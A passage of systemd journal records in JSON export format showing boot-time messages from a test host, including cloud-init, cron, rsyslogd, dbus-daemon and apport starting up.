"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Started Initial cloud-init job (metadata service crawler).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817868317" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d1;b=e2b08827b5804427b422c10c84f1567e;m=2a5c692;t=5bd16df6945f9;x=c1ed6e345db6ff96", "__REALTIME_TIMESTAMP" : "1615280818701817", "__MONOTONIC_TIMESTAMP" : "44418706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "MESSAGE" : "(CRON) INFO (pidfile fd = 3)", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818087625" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d2;b=e2b08827b5804427b422c10c84f1567e;m=2a5cf41;t=5bd16df694ea8;x=9950e60fc01aa9cd", "__REALTIME_TIMESTAMP" : "1615280818704040", "__MONOTONIC_TIMESTAMP" : "44420929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network is Online.", "UNIT" : "network-online.target", "INVOCATION_ID" : "4d22c778885949648c8d9a9eb1486c98", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817876257" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d3;b=e2b08827b5804427b422c10c84f1567e;m=2a5cfba;t=5bd16df694f21;x=8bd8695305210409", "__REALTIME_TIMESTAMP" : "1615280818704161", "__MONOTONIC_TIMESTAMP" : "44421050", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "MESSAGE" : "(CRON) INFO (Running @reboot jobs)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818107817" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d4;b=e2b08827b5804427b422c10c84f1567e;m=2a5d1e9;t=5bd16df695151;x=4db369ca3a42343e", "__REALTIME_TIMESTAMP" : "1615280818704721", "__MONOTONIC_TIMESTAMP" : "44421609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Availability of block devices...", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817886457" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d5;b=e2b08827b5804427b422c10c84f1567e;m=2a5d25e;t=5bd16df6951c5;x=371ffaea4bdf3918", "__REALTIME_TIMESTAMP" : "1615280818704837", "__MONOTONIC_TIMESTAMP" : "44421726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "/usr/sbin/irqbalance", "MESSAGE" : "Balancing is ineffective on systems with a single cpu. Shutting down", "_PID" : "782", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818187602" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d6;b=e2b08827b5804427b422c10c84f1567e;m=2a5d5e2;t=5bd16df69554a;x=544700d31beb3d6a", "__REALTIME_TIMESTAMP" : "1615280818705738", "__MONOTONIC_TIMESTAMP" : "44422626", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems (Pre).", "UNIT" : "remote-fs-pre.target", "INVOCATION_ID" : "a4fe2657835244df874ebd49c332eb72", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817892939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d7;b=e2b08827b5804427b422c10c84f1567e;m=2a5d657;t=5bd16df6955be;x=197acb999049c61f", "__REALTIME_TIMESTAMP" : "1615280818705854", "__MONOTONIC_TIMESTAMP" : "44422743", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "MESSAGE" : "imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd. [v8.32.0]", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301187" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d8;b=e2b08827b5804427b422c10c84f1567e;m=2a5dad1;t=5bd16df695a38;x=d1561caffd4754f8", "__REALTIME_TIMESTAMP" : "1615280818707000", "__MONOTONIC_TIMESTAMP" : "44423889", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems.", "UNIT" : "remote-fs.target", "INVOCATION_ID" : "a3e41334d93141efa0b57ed8ea417097", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817901028" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d9;b=e2b08827b5804427b422c10c84f1567e;m=2a5dbc7;t=5bd16df695b2f;x=d8bf11f61bdd7d75", "__REALTIME_TIMESTAMP" : "1615280818707247", "__MONOTONIC_TIMESTAMP" : "44424135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's groupid changed to 106", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2da;b=e2b08827b5804427b422c10c84f1567e;m=2a5df4a;t=5bd16df695eb1;x=389021366b3d61c8", "__REALTIME_TIMESTAMP" : "1615280818708145", "__MONOTONIC_TIMESTAMP" : "44425034", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Cloud-config availability.", "UNIT" : "cloud-config.target", "INVOCATION_ID" : "6c409315f2ba4f0f91c56317ab4bf1d9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817907846" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2db;b=e2b08827b5804427b422c10c84f1567e;m=2a5e441;t=5bd16df6963a9;x=274d74540f94b061", "__REALTIME_TIMESTAMP" : "1615280818709417", "__MONOTONIC_TIMESTAMP" : "44426305", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's userid changed to 102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301199" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dc;b=e2b08827b5804427b422c10c84f1567e;m=2a5e5a5;t=5bd16df69650c;x=f921319dbb3c7da1", "__REALTIME_TIMESTAMP" : "1615280818709772", "__MONOTONIC_TIMESTAMP" : "44426661", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target System Initialization.", "UNIT" : "sysinit.target", "INVOCATION_ID" : "8489ce32bede4baeaa643a785a33c2a1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817915640" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2dd;b=e2b08827b5804427b422c10c84f1567e;m=2a5e61e;t=5bd16df696586;x=5c3f5f0781ff18d7", "__REALTIME_TIMESTAMP" : "1615280818709894", "__MONOTONIC_TIMESTAMP" : "44426782", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : " [origin software=\"rsyslogd\" swVersion=\"8.32.0\" x-pid=\"783\" x-info=\"http://www.rsyslog.com\"] start", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301202" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2de;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=7cfa936fa298e955", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "MESSAGE" : " * Starting automatic crash report generation: apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2df;b=e2b08827b5804427b422c10c84f1567e;m=2a5e662;t=5bd16df6965c9;x=880efa6ed3af31bd", "__REALTIME_TIMESTAMP" : "1615280818709961", "__MONOTONIC_TIMESTAMP" : "44426850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "334cc89e89814f6d8ec9545baae5f735", "SYSLOG_IDENTIFIER" : "apport", "_PID" : "779", "_SYSTEMD_UNIT" : "apport.service", "_SYSTEMD_INVOCATION_ID" : "db150c2b16db4500a24a8de7446fee26" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e0;b=e2b08827b5804427b422c10c84f1567e;m=2a5e7fb;t=5bd16df696763;x=ca7481cda5aeaab1", "__REALTIME_TIMESTAMP" : "1615280818710371", "__MONOTONIC_TIMESTAMP" : "44427259", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on UUID daemon activation socket.", "UNIT" : "uuidd.socket", "INVOCATION_ID" : "5e99b229418347f591bf5e5be417071b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817920686" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e1;b=e2b08827b5804427b422c10c84f1567e;m=2a5e899;t=5bd16df696800;x=7b7d3b6d6b045b24", "__REALTIME_TIMESTAMP" : "1615280818710528", "__MONOTONIC_TIMESTAMP" : "44427417", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "1", "SYSLOG_IDENTIFIER" : "pollinate", "SYSLOG_PID" : "787", "MESSAGE" : "client sent challenge to [https://entropy.ubuntu.com/]", "_PID" : "812", "_UID" : "110", "_GID" : "1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818308095" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e2;b=e2b08827b5804427b422c10c84f1567e;m=2a5eb55;t=5bd16df696abc;x=2f156472965a9002", "__REALTIME_TIMESTAMP" : "1615280818711228", "__MONOTONIC_TIMESTAMP" : "44428117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Socket activation for snappy daemon.", "UNIT" : "snapd.socket", "INVOCATION_ID" : "c6935bf9d91547fda67694f77a0fb293", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817929481" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e3;b=e2b08827b5804427b422c10c84f1567e;m=2a5ebba;t=5bd16df696b22;x=4966d0287197bbc5", "__REALTIME_TIMESTAMP" : "1615280818711330", "__MONOTONIC_TIMESTAMP" : "44428218", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "MESSAGE" : "[system] AppArmor D-Bus mediation is enabled", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818332886" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e4;b=e2b08827b5804427b422c10c84f1567e;m=2a5f395;t=5bd16df6972fc;x=cacb4ca893e9e258", "__REALTIME_TIMESTAMP" : "1615280818713340", "__MONOTONIC_TIMESTAMP" : "44430229", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Message of the Day.", "UNIT" : "motd-news.timer", "INVOCATION_ID" : "8863f0fafcad47bcad4c71fc9fa92ebd", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817940642" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e5;b=e2b08827b5804427b422c10c84f1567e;m=2a5f427;t=5bd16df69738f;x=de32ed590e437342", "__REALTIME_TIMESTAMP" : "1615280818713487", "__MONOTONIC_TIMESTAMP" : "44430375", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.hostname1' unit='dbus-org.freedesktop.hostname1.service' requested by ':1.0' (uid=100 pid=600 comm=\"/lib/systemd/systemd-networkd \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818337092" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e6;b=e2b08827b5804427b422c10c84f1567e;m=2a5f587;t=5bd16df6974ee;x=d0573be2806b787a", "__REALTIME_TIMESTAMP" : "1615280818713838", "__MONOTONIC_TIMESTAMP" : "44430727", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on D-Bus System Message Bus Socket.", "UNIT" : "dbus.socket", "INVOCATION_ID" : "8b5e9356754c4f3794b0647122801a1a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817945476" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e7;b=e2b08827b5804427b422c10c84f1567e;m=2a5f633;t=5bd16df69759b;x=d60627d30e6fb974", "__REALTIME_TIMESTAMP" : "1615280818714011", "__MONOTONIC_TIMESTAMP" : "44430899", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", 